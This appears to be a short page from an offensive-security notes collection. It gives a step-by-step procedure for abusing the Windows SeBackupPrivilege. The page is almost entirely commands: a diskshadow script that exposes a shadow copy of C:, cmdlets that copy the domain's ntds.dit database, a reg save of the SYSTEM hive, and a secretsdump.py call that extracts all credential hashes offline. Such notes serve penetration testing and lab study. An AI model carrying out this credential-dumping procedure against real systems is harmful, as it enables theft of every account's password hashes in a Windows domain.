killchain-compendium/post exploitation/docs/windows/sebackupprivilege.md

1.1 KiB

SEBackupPrivilege Escalation

  • Check user privileges to escalate

Usage

  • Check whoami /all
  • SeBackupPrivilege must be present
  • Payloads all the things
  • Upload diskshadow.txt to the target with the following content, there has to be a space at the end of each line!!!!
set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h: 
  • Change dir to C:\Windows\System32 and diskshadow.exe /s C:\tmp\diskshadow.txt
  • Upload these dlls to the target
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\tmp\system
  • Downloads the files ntds.dit and system
  • Extract the hashes via
secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt